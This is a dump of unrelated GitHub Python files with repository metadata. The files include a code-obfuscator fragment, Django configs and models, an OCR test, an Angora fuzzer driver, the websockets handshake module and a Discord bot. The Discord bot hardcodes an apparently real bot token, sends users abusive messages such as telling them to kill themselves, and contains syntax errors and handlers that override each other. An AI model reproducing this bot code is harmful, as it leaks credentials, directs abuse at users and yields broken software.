            ) + Optional(self.comment).suppress()
        )
        # 'from <pkg> import <names>' lines, keeping 'from'/'import' and
        # identifiers for the parse action below.
        self.from_import = (
            ZeroOrMore(
                (self.tab.suppress() |
                 Literal('from') |
                 self.directive.suppress() |
                 self.tab.suppress() |
                 self.ident |
                 Literal('import') |
                 self.separator.suppress() |
                 self.fnumber.suppress() |
                 self.string_or_doc.suppress() |
                 self.triple_quote.suppress())
            ) + Optional(self.comment).suppress()
        )
        # Attach the parse actions that record reserved names / rewrite paths.
        self.except_error.setParseAction(self.add_except_error)
        self.builder.setParseAction(self.transform_builder)
        self.from_import.setParseAction(self.add_from_import)
    ###############
    # Parse actions
    ###############
    def add_from_import(self, from_import_list):
        """Add imported modules from reserved modules to reserved.
        Parameters
        ----------
        from_import_list : list
        """
        if not from_import_list or \
                from_import_list[0] != 'from' or \
                'import' not in from_import_list[:]:
            return
        reserved_list = set()
        import_index = from_import_list[:].index('import')
        package_name = ''
        is_reserved = False
        for reserve_name in from_import_list[1:import_index]:
            # Start with first reserved directory in tree (if one exists)
            if not is_reserved:
                try:
                    get_reserved_by_name(reserve_name)
                    is_reserved = True
                    package_name = reserve_name
                except DoesNotExist:
                    continue
            if is_reserved:
                # Keep only names that look like identifiers.
                if reserve_name[0].isalpha() or reserve_name[0] == '_':
                    reserved_list.add(reserve_name)
        if is_reserved:
            # Get imported items
            for reserve_name in from_import_list[import_index+1:]:
                if reserve_name[0].isalpha() or reserve_name[0] == '_':
                    reserved_list.add(reserve_name)
            add_reserveds(package_name, reserved_list)
    def add_except_error(self, except_error_list):
        """Add except Error names to reserved.
        Parameters
        ----------
        except_error_list : list
        """
        if not except_error_list or except_error_list[0] != 'except':
            return
        reserved_list = set()
        package_name = 'Except'
        for reserve_name in except_error_list[1:]:
            # Stop at the 'as' alias keyword; only exception names count.
            if reserve_name == 'as':
                break
            if reserve_name[0].isalpha() or reserve_name[0] == '_':
                reserved_list.add(reserve_name)
        if reserved_list:
            add_reserveds(package_name, reserved_list)
    def transform_builder(self, builder_list):
        """Parse a Kivy load_file statement.
        Parameters
        builder_list : list
            Kivy Builder.load_file statement.
        """
        # Rebuild the call with the .kv path replaced by its obfuscated form.
        return ''.join([
            builder_list[0],
            "'",
            obfuscate_path(builder_list[1].strip("'")),
            "'",
            builder_list[2]
        ])
| [
"rdevost@vinntech.com"
] | rdevost@vinntech.com |
a43a94fe49f1a181172f2b8eeeea80d2cf798ac7 | 2d159be77b57885577ded673a45864f09fc2a325 | /gio_spa/gio_spa/asgi.py | 844d6ed81ac4ac40b3201ee58a2e8fb3c1250554 | [] | no_license | mimrot47/Rest_Api_project | 9c6f7a0f4d03dd5ca39f75430f0f6185048b775b | 1676a15f889c13b45f05762efa6516080da54d7e | refs/heads/main | 2023-05-15T08:55:02.004292 | 2021-06-05T06:14:06 | 2021-06-05T06:14:06 | 374,035,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | """
ASGI config for gio_spa project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Default the settings module (real deployments may override it) and expose
# the ASGI callable for the application server.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gio_spa.settings')
application = get_asgi_application()
| [
"mimrot47@gmail.com"
] | mimrot47@gmail.com |
8fd146079d1a9f6917223a64b72335f79a3d52f5 | fbec714e4080ba960a4579db9b968d6b7fbd271c | /test.py | d7b4dca8b5db5b9d3dfe5966c20691358f8469a9 | [] | no_license | Harshul-24/seq2seq-attention-ocr-pytorch | ad0f4430473ec449eda8dc383163a3de35c681c6 | 438c7d1ea43cd7ce1976313d6b6df14f8e2d7dd9 | refs/heads/master | 2023-06-30T18:33:11.069771 | 2021-07-24T16:40:03 | 2021-07-24T16:40:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,239 | py | import torch
from PIL import Image
from pytorch_lightning import Trainer
from src.aocr import OCR, OCRDataModule
from src.utils import dataset, utils
def test(
    test_path,
    is_dataset = False,
    output_pred_path='output.txt',
    checkpoint_path='models/aocr.pth'
):
    # Run OCR inference. With is_dataset=True, test_path is a dataset list
    # evaluated via Lightning's Trainer (returns None); otherwise test_path
    # is a single image and the function returns (words, prob,
    # attention_matrix). output_pred_path is currently unused here.
    ocr = OCR()
    ocr.load_state_dict(torch.load(checkpoint_path))
    ocr.eval()
    if is_dataset:
        dm = OCRDataModule(test_list=test_path)
        t = Trainer()
        t.test(ocr, dm)
    else:
        # Resize/normalize the image to the model's expected input size,
        # add a batch dimension, then decode with attention outputs.
        transformer = dataset.ResizeNormalize(img_width=ocr.img_width, img_height=ocr.img_height)
        image = Image.open(test_path).convert('RGB')
        image = transformer(image)
        image = image.view(1, *image.size())
        image = torch.autograd.Variable(image)
        decoder_outputs, attention_matrix = ocr(image, None, is_training=False, return_attentions=True)
        words, prob = utils.get_converted_word(decoder_outputs, get_prob=True)
        return words, prob, attention_matrix
if __name__ == "__main__":
w,_,_ = test(r'data/predict-1-12/image.PNG')
di = utils.digitIterator(w)
# with open("sample.txt", "w", encoding="utf-8") as f:
# f.write(di.get_str())
print(w,di.get_str())
| [
"sumanmichael01@gmail.com"
] | sumanmichael01@gmail.com |
f960540c3fb3be6af7a98ec90b85f320fe56808f | 2a40c887a0d51dcd3338aa82e4d93819fb11a8bb | /bot.py | b01fe153d0e371bed8a781b65261764dc0d4fb3a | [] | no_license | RIHARDA/Roblox | 17bdbba49e73b6ff022f3f62e7b557c31f5012d0 | f426d9f65edc782c7d330af157bcac536ad84590 | refs/heads/master | 2020-03-31T05:09:45.752282 | 2018-10-07T11:50:47 | 2018-10-07T11:50:47 | 151,935,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,588 | py | import discord
from discord.ext.commands import Bot
from discord.ext import commands
import asyncio
import time
import random
from discord import Game
# NOTE(review): 'Client' is bound to the discord.client MODULE (not a class)
# and 'Clientdiscord' is never used afterwards -- both look like leftovers.
Client = discord.client
client = commands.Bot(command_prefix = '$')
Clientdiscord = discord.Client()
@client.event
async def on_member_join(member):
    # Greet every new member via DM and log the event to stdout.
    print('Recognised that a member called ' + member.name + ' joined')
    await client.send_message(member, 'yooo thank for joining')
    print('Sent message to ' + member.name)
# NOTE(review): on_ready has no @client.event decorator, so it is never
# registered and this presence/startup code never runs -- confirm intent.
async def on_ready():
    await client.change_presence(game=Game(name='With People'))
    print('Ready, Freddy')
@client.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def ban(ctx , user : discord.Member):
    # Admin-only: ban the mentioned member. author/Server are unused locals.
    author = ctx.message.author
    Server = ctx.message.server
    await client.ban(user)
@client.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def kick(ctx , user : discord.Member):
    # Admin-only: kick the mentioned member.
    author = ctx.message.author
    Server = ctx.message.server
    await client.kick(user)
@client.command(pass_context=True)
@commands.has_permissions(administrator=True)
async def unban(ctx , user : discord.Member):
    # Admin-only: unban the given member.
    # NOTE(review): discord.Member converters cannot resolve users who are
    # no longer in the server -- verify this command actually works.
    author = ctx.message.author
    Server = ctx.message.server
    await client.unban(user)
# NOTE(review): three separate 'on_message' handlers are registered with
# @client.event in this file; each registration replaces the previous one,
# so only the LAST on_message definition is ever called.
@client.event
async def on_message(message):
    if message.content == '$invite':
        await client.send_message(message.channel,' <@%s> https://discordapp.com/api/oauth2/authorize?client_id=493529797130059798&permissions=8&scope=bot')
        # NOTE(review): 'randomlist' is not defined in this handler -- this
        # line raises NameError if reached.
        await client.send_message(message.channel,(random.choice(randomlist)))
    if message.content.startswith('$help'):
        await client.send_message(message.channel,'<@%s> Help is Not A Command Yes Due to delevoper working on me')
@client.event
async def on_message(message):
    # Second of three on_message registrations in this file (each overrides
    # the previous). Handles swear filtering, coinflip/diceroll and a few
    # canned replies.
    #
    # SYNTAX FIX: the original had "if ...startswith(...):'$'" followed by an
    # indented block -- an IndentationError that prevented the whole module
    # from loading. The stray '$' string literals after the colons were
    # removed, and the undefined 'prefix' name is now bound to the bot's
    # command prefix (the Bot above is created with command_prefix='$').
    prefix = '$'
    if ('heck') in message.content:
        await client.delete_message(message)
    if message.content == 'heck':
        await client.send_message(message.channel,'NO SWEARING ITS A CHRISTIAN SERVER!!!')
    if message.content.startswith('%scoinflip' %(prefix)):
        randomlist = ['heads','tails',]
        await client.send_message(message.channel,(random.choice(randomlist)))
    if message.content.startswith('%sdiceroll' %(prefix)):
        randomlist = ['1','2','3','4','5','6',]
        await client.send_message(message.channel,(random.choice(randomlist)))
    if message.content == prefix +'your_mum_gay':
        await client.send_message(message.channel,' Dude your_mum_gay')
    if message.content == prefix +'creator':
        await client.send_message(message.channel,'I Am Created By Developer: Aj#1636.')
    if message.content == prefix +'hi':
        # BUG FIX: the original called send_message(message.channel) with no
        # text and left ('hello') as a dangling expression on the next line.
        await client.send_message(message.channel,'hello')
    if message.content == prefix +'help':
        await client.send_message(message.channel,'hey dude my predix is `$`.')
@client.event
async def on_message(message):
    # Third on_message registration -- being last, this is the only handler
    # discord.py actually invokes (earlier on_message definitions above are
    # overridden).
    if message.content == '$ping':
        await client.send_message(message.channel,'pong')
    if message.content == '$img':
        em = discord.Embed(description='Anime cat girl lol')
        em.set_image(url='https://cdn.discordapp.com/attachments/436300751711633410/494223717853822996/tenor.gif')
        await client.send_message(message.channel, embed=em)
    if ('Hello') in message.content:
        await client.delete_message(message)
    if message.content == '$say no u':
        await client.send_message(message.channel,'no u')
    if message.content == '$say aj amzing':
        await client.send_message(message.channel,'aj amzing')
    if message.content == '$say lol':
        await client.send_message(message.channel,'lol')
    if message.content == '$no_u':
        await client.send_message(message.channel,'no u')
    # NOTE(review): this startswith('$') branch matches EVERY '$...' message,
    # including all the commands above, so it replies to them too.
    if message.content.startswith('$'):
        randomlist = ["is back", "returns", "is amazing"]
        await client.send_message(message.channel,(random.choice(randomlist)))
    if message.content.startswith('$twlljoke'):
        randomlist = ["your mum is gay", "your dad is lesbian", "your sister mister", "your brother mother"]
        await client.send_message(message.channel,(random.choice(randomlist)))
    if message.content == '$info':
        await client.send_message(message.channel,'idk why you here lol just kys,,,, type "$help" for some help :) xD')
    if message.content == '$help2':
        await client.send_message(message.channel,'commands are: "$ping", "$img", "$your_mum_gay", "$no_u", "$sovietrussia", "$twlljoke", "$info", "$help"')
# SECURITY(review): the bot token is hardcoded in source and has been
# committed/published -- it must be considered compromised. Revoke it and
# load a fresh token from an environment variable or config file instead.
client.run('NDk2MDg2NjI2NDUyMzczNTY0.DpgXEQ.eSFmx8kwxav4j0PdOLZL8ooPsZU')
# Starts the bot.
| [
"noreply@github.com"
] | noreply@github.com |
8202af22fadd2dfe1949f94d3867d8fe381f2584 | 5e22770baeaea428fe49f0ae5fb504bc99194593 | /autofz/fuzzer_driver/angora.py | 6b6e7ae3f9140fa9dc0785bafdf15ad6f2a09166 | [
"MIT"
] | permissive | sslab-gatech/autofz | 0b1c0c68849301efc5f51c97e50a5686416b692b | b9a795dda252aa37406d593434b710b0fbedd177 | refs/heads/main | 2023-08-01T08:24:07.236758 | 2023-04-25T22:12:49 | 2023-04-25T22:12:49 | 605,261,111 | 45 | 4 | null | null | null | null | UTF-8 | Python | false | false | 5,738 | py | import os
import pathlib
import sys
import time
import peewee
# from .. import config as Config
from autofz import config as Config
from . import afl
from .controller import Controller
from .db import AngoraModel, ControllerModel, db_proxy
from .fuzzer import FuzzerDriverException, PSFuzzer
CONFIG = Config.CONFIG
FUZZER_CONFIG = CONFIG['fuzzer']
class Angora(PSFuzzer):
    """Process driver for a single Angora fuzzer instance."""
    def __init__(self,
                 seed,
                 output,
                 group,
                 program,
                 argument,
                 thread=1,
                 pid=None,
                 cgroup_path = ''):
        '''
        fuzzer_id used to distinguish different slaves
        '''
        # Angora-specific debug log lives two levels above the output dir.
        debug_file=os.path.realpath(os.path.join(output,'..','..','autofz_angora.log'))
        debug = False
        super().__init__(pid, debug=debug, debug_file=debug_file)
        self.seed = seed
        self.output = output
        self.group = group
        self.program = program
        self.argument = argument
        self.name = 'angora'
        self.thread = thread
        self.cgroup_path = cgroup_path
        self.__proc = None
        # Lazily parsed contents of angora/fuzzer_stats (see fuzzer_stats).
        self.__fuzzer_stats = None
    def update_fuzzer_stats(self):
        # Re-parse the AFL-style stats file Angora writes under its output dir.
        fuzzer_stats_file = f'{self.output}/angora/fuzzer_stats'
        self.__fuzzer_stats = afl.parse_fuzzer_stats(fuzzer_stats_file)
    @property
    def fuzzer_stats(self):
        # Cached stats; parsed on first access only.
        if self.__fuzzer_stats is None:
            self.update_fuzzer_stats()
        return self.__fuzzer_stats
    @property
    def pid_(self):
        # PID recorded by the fuzzer itself, or None before stats exist.
        if not self.fuzzer_stats: return None
        return int(self.fuzzer_stats['fuzzer_pid'])
    @property
    def is_ready(self):
        # The fuzzer is "ready" once it has produced a stats file.
        return self.fuzzer_stats is not None
    def gen_env(self):
        # Prepend Angora's bundled clang/LLVM libs to LD_LIBRARY_PATH and
        # disable its CPU binding (autofz manages CPU via cgroups).
        LD_LIBRARY_PATH = os.environ.get('LD_LIBRARY_PATH')
        NEW_PATH = f'/fuzzer/angora/clang+llvm/lib:{LD_LIBRARY_PATH}'
        return {'ANGORA_DISABLE_CPU_BINDING': '1',
                'LD_LIBRARY_PATH':NEW_PATH}
    @property
    def target(self):
        # Instrumented (fast) binary path: <root>/<group>/<program>/<program>.
        global FUZZER_CONFIG
        target_root = FUZZER_CONFIG['angora']['target_root']
        return os.path.join(target_root, self.group,self.program,self.program)
    @property
    def target_taint(self):
        # Taint-tracking binary path used with Angora's -t option.
        global FUZZER_CONFIG
        target_root = FUZZER_CONFIG['angora']['target_root_taint']
        return os.path.join(target_root, self.group,self.program,self.program)
    def gen_cwd(self):
        # Run the fuzzer from the target binary's directory.
        return os.path.dirname(self.target)
    def check(self):
        # Fail fast when either target binary is missing.
        ret = True
        ret &= os.path.exists(self.target)
        ret &= os.path.exists(self.target_taint)
        if not ret:
            raise FuzzerDriverException
    def gen_run_args(self):
        # Build the angora_fuzzer command line, optionally wrapped in cgexec
        # to confine CPU usage to the configured cgroup.
        self.check()
        global FUZZER_CONFIG
        command = FUZZER_CONFIG['angora']['command']
        args = []
        if self.cgroup_path:
            args += ['cgexec','-g',f'cpu:{self.cgroup_path}']
        args += [command]
        args += ['-M', str(0)]
        args += ['--jobs', str(self.thread)]
        args += ['-S']
        args += ['--input', self.seed]
        args += ['--output', self.output]
        args += [
            '-t',
            self.target_taint
        ]
        args += [
            '--',
            self.target
        ]
        args += self.argument.split(' ')
        return args
class ANGORAController(Controller):
    """Controller that starts/pauses/resumes/stops Angora, persisting state in SQLite."""
    def __init__(self, seed, output, group, program, argument, thread=1, cgroup_path=''):
        # Per-fuzzer SQLite DB so controller restarts can re-attach to a
        # running Angora instance.
        self.db = peewee.SqliteDatabase(
            os.path.join(Config.DATABASE_DIR, 'autofz-angora.db'))
        self.name = 'angora'
        self.seed = seed
        self.output = output
        self.group = group
        self.program = program
        self.argument = argument
        self.thread = thread
        self.cgroup_path = cgroup_path
        self.angoras = []
        # Constructor kwargs reused when (re)creating Angora drivers and DB rows.
        self.kwargs = {
            'seed': self.seed,
            'output': self.output,
            'group': self.group,
            'program': self.program,
            'argument': self.argument,
            'thread': self.thread,
            'cgroup_path' : self.cgroup_path
        }
    def init(self):
        # Bind the peewee proxy, ensure tables exist, and re-attach driver
        # objects for any Angora instances recorded in the DB.
        db_proxy.initialize(self.db)
        self.db.connect()
        self.db.create_tables([AngoraModel, ControllerModel])
        for fuzzer in AngoraModel.select():
            angora = Angora(seed=fuzzer.seed,
                            output=fuzzer.output,
                            group=fuzzer.group,
                            program=fuzzer.program,
                            argument=fuzzer.argument,
                            thread=fuzzer.thread,
                            pid=fuzzer.pid)
            self.angoras.append(angora)
    def start(self):
        # Launch one Angora instance (thread-based scaling happens inside it),
        # record it in the DB, and drop a 'ready' marker file for autofz.
        if self.angoras:
            print('already started', file=sys.stderr)
            return
        # start Angora
        angora = Angora(**self.kwargs)
        angora.start()
        # wait angora pid
        while not angora.is_ready:
            time.sleep(1)
        AngoraModel.create(**self.kwargs, pid=angora.pid_)
        ControllerModel.create(scale_num=1)
        time.sleep(10)
        ready_path = os.path.join(self.output, 'ready')
        pathlib.Path(ready_path).touch(mode=0o666, exist_ok=True)
    def scale(self, scale_num):
        '''
        NOTE: angora uses thread model
        '''
        pass
    def pause(self):
        # Suspend all tracked Angora processes (SIGSTOP via PSFuzzer).
        for angora in self.angoras:
            angora.pause()
    def resume(self):
        '''
        NOTE: prserve scaling
        '''
        # NOTE(review): the fetched controller row is unused here; presumably
        # kept to preserve the recorded scale -- confirm.
        controller = ControllerModel.get()
        for angora in self.angoras:
            angora.resume()
    def stop(self):
        # Kill the fuzzer processes and clear the persisted state tables.
        for angora in self.angoras:
            angora.stop()
        self.db.drop_tables([AngoraModel, ControllerModel])
| [
"yufu@gatech.edu"
] | yufu@gatech.edu |
cf3e02a47a50e7f8e35623384b86ddcc999afb4e | 862d67a22cfe79eca0453331ceba86c251fabcf2 | /project_env/lib/python3.6/site-packages/websockets/handshake.py | fedc6c502388cf431fbd148f85c3cb0ad10a1f94 | [
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | tejon-melero/minimal-python-web3-read-blockchain-example | acc66edbfeba6594ba77bd770e7da705c7b0f5f4 | f6983e4b87323670aded2498337012a18c03522e | refs/heads/master | 2022-12-16T20:50:19.383597 | 2018-10-19T12:23:05 | 2018-10-19T12:23:05 | 150,777,051 | 3 | 3 | null | 2022-11-03T07:39:04 | 2018-09-28T18:01:41 | Python | UTF-8 | Python | false | false | 5,218 | py | """
The :mod:`websockets.handshake` module deals with the WebSocket opening
handshake according to `section 4 of RFC 6455`_.
.. _section 4 of RFC 6455: http://tools.ietf.org/html/rfc6455#section-4
It provides functions to implement the handshake with any existing HTTP
library. You must pass to these functions:
- A ``set_header`` function accepting a header name and a header value,
- A ``get_header`` function accepting a header name and returning the header
value.
The inputs and outputs of ``get_header`` and ``set_header`` are :class:`str`
objects containing only ASCII characters.
Some checks cannot be performed because they depend too much on the
context; instead, they're documented below.
To accept a connection, a server must:
- Read the request, check that the method is GET, and check the headers with
:func:`check_request`,
- Send a 101 response to the client with the headers created by
:func:`build_response` if the request is valid; otherwise, send an
appropriate HTTP error code.
To open a connection, a client must:
- Send a GET request to the server with the headers created by
:func:`build_request`,
- Read the response, check that the status code is 101, and check the headers
with :func:`check_response`.
"""
import base64
import binascii
import hashlib
import random
from .exceptions import InvalidHeaderValue, InvalidUpgrade
from .headers import parse_connection, parse_upgrade
# Public API of this module.
__all__ = [
    'build_request', 'check_request',
    'build_response', 'check_response',
]
# Fixed GUID appended to the client key when computing Sec-WebSocket-Accept
# (RFC 6455, section 4.2.2).
GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
def build_request(set_header):
    """
    Build a handshake request to send to the server.
    Return the ``key`` which must be passed to :func:`check_response`.
    """
    # Sec-WebSocket-Key is 16 random bytes, base64-encoded (RFC 6455 §4.1).
    nonce = bytes(random.getrandbits(8) for _ in range(16))
    key = base64.b64encode(nonce).decode()
    for name, value in (
        ('Upgrade', 'websocket'),
        ('Connection', 'Upgrade'),
        ('Sec-WebSocket-Key', key),
        ('Sec-WebSocket-Version', '13'),
    ):
        set_header(name, value)
    return key
def check_request(get_header):
    """
    Check a handshake request received from the client.
    If the handshake is valid, this function returns the ``key`` which must be
    passed to :func:`build_response`.
    Otherwise it raises an :exc:`~websockets.exceptions.InvalidHandshake`
    exception and the server must return an error like 400 Bad Request.
    This function doesn't verify that the request is an HTTP/1.1 or higher GET
    request and doesn't perform Host and Origin checks. These controls are
    usually performed earlier in the HTTP request handling code. They're the
    responsibility of the caller.
    """
    # Connection must contain an 'upgrade' token (case-insensitive).
    connection = parse_connection(get_header('Connection'))
    if not any(value.lower() == 'upgrade' for value in connection):
        raise InvalidUpgrade('Connection', get_header('Connection'))
    upgrade = parse_upgrade(get_header('Upgrade'))
    # For compatibility with non-strict implementations, ignore case when
    # checking the Upgrade header. It's supposed to be 'WebSocket'.
    if not (len(upgrade) == 1 and upgrade[0].lower() == 'websocket'):
        raise InvalidUpgrade('Upgrade', get_header('Upgrade'))
    key = get_header('Sec-WebSocket-Key')
    try:
        # validate=True rejects non-base64 characters outright.
        raw_key = base64.b64decode(key.encode(), validate=True)
    except binascii.Error:
        raise InvalidHeaderValue('Sec-WebSocket-Key', key)
    # The decoded key must be exactly 16 random bytes (RFC 6455 §4.2.1).
    if len(raw_key) != 16:
        raise InvalidHeaderValue('Sec-WebSocket-Key', key)
    version = get_header('Sec-WebSocket-Version')
    if version != '13':
        raise InvalidHeaderValue('Sec-WebSocket-Version', version)
    return key
def build_response(set_header, key):
    """
    Build the server's handshake response.

    ``key`` is the value returned by :func:`check_request`.
    """
    for name, value in (('Upgrade', 'websocket'), ('Connection', 'Upgrade')):
        set_header(name, value)
    # The accept token proves to the client that the server understood the
    # WebSocket handshake (see accept()).
    set_header('Sec-WebSocket-Accept', accept(key))
def check_response(get_header, key):
    """
    Validate the server's opening-handshake response.

    ``key`` is the value returned by :func:`build_request`.  Returns ``None``
    when the handshake is valid and raises an
    :exc:`~websockets.exceptions.InvalidHandshake` subclass otherwise.

    Checking that the response is an HTTP/1.1-or-higher response with a 101
    status code is the caller's responsibility.
    """
    connection_tokens = parse_connection(get_header('Connection'))
    if not any(token.lower() == 'upgrade' for token in connection_tokens):
        raise InvalidUpgrade('Connection', get_header('Connection'))
    upgrade_tokens = parse_upgrade(get_header('Upgrade'))
    # Deliberately case-insensitive: the spec spells it 'WebSocket', but
    # non-strict implementations use other capitalizations.
    if [token.lower() for token in upgrade_tokens] != ['websocket']:
        raise InvalidUpgrade('Upgrade', get_header('Upgrade'))
    expected = accept(key)
    if get_header('Sec-WebSocket-Accept') != expected:
        raise InvalidHeaderValue(
            'Sec-WebSocket-Accept', get_header('Sec-WebSocket-Accept'))
def accept(key):
    """Compute the ``Sec-WebSocket-Accept`` value for ``key``: the base64
    encoding of the SHA-1 digest of the key concatenated with the protocol
    GUID (RFC 6455 §4.2.2).
    """
    digest = hashlib.sha1((key + GUID).encode()).digest()
    return base64.b64encode(digest).decode()
| [
"matthias.karacsonyi@gmail.com"
] | matthias.karacsonyi@gmail.com |
5fc343ec90562a8219c711b173ff55a920e06348 | 7dd0264f3aced4bb7b798fe19862ab545bdd8e38 | /account/models.py | 39e63eae1112ecf6204d157496ec188a4a2205e2 | [] | no_license | NSLIGHT/fullthrottledjangoapp | 593e60404644499fa284d248adee459b9e5cbf70 | a1d57a49e9ce596e6b1552998d4753c953243a7d | refs/heads/master | 2022-12-23T06:43:55.331335 | 2020-09-22T05:59:13 | 2020-09-22T05:59:13 | 297,293,529 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | from django.db import models
from django.db import models
from django.contrib.auth.models import User
from django.utils.timezone import now
import datetime
from django.contrib.postgres.fields import ArrayField
class member(models.Model):
    """A workspace member record keyed by an externally supplied string id.

    Field names (id, real_name, tz) suggest a Slack-style user export —
    TODO confirm the data source.
    """
    # External string identifier used as the primary key (no auto id field).
    id = models.CharField(verbose_name = "id",max_length=100,primary_key=True,unique=True)
    # Display name; uniqueness is enforced at the database level.
    real_name = models.CharField(unique=True,max_length=100)
    # Time-zone stored as free text — format not constrained here.
    tz = models.CharField(max_length=100)
    # Session bookkeeping; both default to the row-creation time (now).
    last_login = models.DateTimeField(default=now,auto_now=False, auto_now_add=False)
    last_logout = models.DateTimeField(default=now,auto_now=False, auto_now_add=False)
    def __str__(self):
        return self.real_name
class start_end_time(models.Model):
    """A reusable (start_time, end_time) interval row.

    Referenced by membership.activity_period via a foreign key.
    Both endpoints are nullable and default to the creation time.
    """
    start_time = models.DateTimeField(default=now,auto_now=False, auto_now_add=False,null=True,blank=True,verbose_name="start_time")
    end_time = models.DateTimeField(default=now,auto_now=False, auto_now_add=False,null=True,blank=True,verbose_name="end_time")
    def __str__(self):
        # Rendered as "start, end" for admin/listing displays.
        return str(self.start_time) + ", " + str(self.end_time)
class membership(models.Model):
    """Like `member`, but tracks an activity period instead of raw
    login/logout timestamps.

    NOTE(review): duplicates the id/real_name/tz fields of `member` —
    consider a shared abstract base model.
    """
    # External string identifier used as the primary key (no auto id field).
    id = models.CharField(verbose_name = "id",max_length=100,primary_key=True,unique=True)
    real_name = models.CharField(unique=True,max_length=100)
    tz = models.CharField(max_length=100)
    # One interval row per membership; deleting the interval cascades here.
    activity_period = models.ForeignKey(start_end_time,on_delete=models.CASCADE)
    def __str__(self):
        return self.real_name
# class UserManager(BaseUserManager):
# def create_user(self, id,real_name,password=None):
# if not id:
# raise ValueError("User must have a id")
# if not real_name:
# raise ValueError("User must have a real name")
# user = self.model(
# id = id,
# real_name = real_name,
# password = password,
# )
# user.set_password(password)
# user.save(using=self._db)
# return user
# def create_superuser(self,id,real_name,password):
# user = self.create_user(
# id = id,
# real_name = real_name,
# password = password,
# )
# user.is_admin = True
# user.is_staff = True
# user.is_superuser = True
# user.save(using=self._db)
# return user
# def authenticate(self, request, real_name=None, password=None):
# login_valid = (settings.ADMIN_LOGIN == real_name)
# pwd_valid = check_password(password, settings.ADMIN_PASSWORD)
# if login_valid and pwd_valid:
# try:
# user = User.objects.get(real_name=real_name)
# except User.DoesNotExist:
# # Create a new user. There's no need to set a password
# # because only the password from settings.py is checked.
# user = User(real_name=real_name)
# user.is_staff = True
# user.is_superuser = True
# user.save()
# return user
# return None
| [
"newtonkaleja@gmail.com"
] | newtonkaleja@gmail.com |
82a29e952d943526f88af2dd50b7eda0da44f165 | a38aa3779c16f31d02a2df031fd4ce072facaeb9 | /project/utils.py | 7ae54df72e5e3e66e59363eb3dbee5eab2359549 | [
"MIT"
] | permissive | nikifkon-old/csa-almaty-bot | a0a39673dfa39eb5f6ac6dd58eea08008d52c350 | f18d087c86b3b90171dec080e780e330d62e711a | refs/heads/master | 2022-11-30T07:16:45.839562 | 2020-08-19T09:48:39 | 2020-08-19T09:48:39 | 288,692,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | QUESTION_CHAR = "❓"
EXCLAMATION_CHAR = "❗️"
SEARCH_CHAR = "🔎"
BACK_CHAR = "🔙"
MENU_CHAR = "☰"
BACK_TO_MENU_TEXT = "{prefix} Вернуться к списку категорий".format(prefix=MENU_CHAR)
BACK_TO_SEARCH_RESULT = "{prefix} Вернуться к результатам поиска".format(prefix=BACK_CHAR)
OPEN_SEARCH = "{prefix} Найти вопрос".format(prefix=SEARCH_CHAR)
TRY_SEARCH_AGAIN = "{prefix} Попробовать найти ещё раз".format(prefix=SEARCH_CHAR)
| [
"kostya.nik.3854@gmail.com"
] | kostya.nik.3854@gmail.com |
5b2cfdc8e73ea9308c9325c317d819077673550c | ad9d7c6103338da7f0786713fcc6e3797a5086ee | /user/models.py | 4e753e578aa6c6a16edbf081664c864167aa72c3 | [] | no_license | Azazel5/CareerAlly | 2a9ca43faef875054a762b663ab371ca959dd05f | 2dbd137593243816fa70ecd571351ff2d5675f7d | refs/heads/master | 2021-05-18T04:18:14.347406 | 2020-04-20T16:13:55 | 2020-04-20T16:13:55 | 251,102,423 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 533 | py | from django.db import models
from django.contrib.auth.models import User
from internship.models import InternshipModel
class UserInternshipProfile(models.Model):
    """Links an auth User to one internship application plus free-form notes."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    # Nullable: a profile row may exist before any application is recorded.
    internships_applied = models.ForeignKey(InternshipModel, on_delete=models.CASCADE, blank=True, null=True)
    notes = models.TextField(blank=True, null=True)
    def __str__(self):
        # NOTE(review): dereferences internships_applied, which is nullable —
        # this raises AttributeError when it is None; confirm that cannot occur.
        return self.user.username + ' - ' + f'({self.internships_applied.pk}) ' + self.internships_applied.position_name
| [
"subhanga2013@gmail.com"
] | subhanga2013@gmail.com |
ee84a86fbfe3005a8273fc6ab0187d6b08601a5f | 4fa8af452baec12a47f3148b654cf2c51efee869 | /lab3/main.py | c989e48b717bf3bee0f3ef9322c1041cefbd2fed | [] | no_license | VitalyVV/inno_datamining_spring | 168b4e591c45c5821782c8bc37f16469e126860b | ddd9d935b72125fbac632d209e8cf000fdd2c6bf | refs/heads/master | 2020-04-21T02:29:54.081084 | 2019-02-28T10:44:44 | 2019-02-28T10:44:44 | 169,256,450 | 0 | 0 | null | 2019-02-28T10:45:58 | 2019-02-05T14:44:41 | Jupyter Notebook | UTF-8 | Python | false | false | 81 | py | from .noisy_mnist import dataset
import numpy as np
noisy, clean = dataset()
| [
"v.volobuev@innopolis.ru"
] | v.volobuev@innopolis.ru |
41e48a86030f730e374988d7f00909bc2d3b0cc9 | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/age_sex_20190618092905.py | f95b9e064c825ab7d3d8a555a7f973fcb638f23b | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHR-all')#txt目录提取
# For every EMR text file: pick out the sex marker line ('男'/'女') and the
# age line (number before '岁'), then write them to a per-patient output file.
for emrtxt in emrtxts:
    # Context manager closes the file (the original leaked the handle);
    # errors="ignore" skips bytes that do not decode in Chinese EMR text.
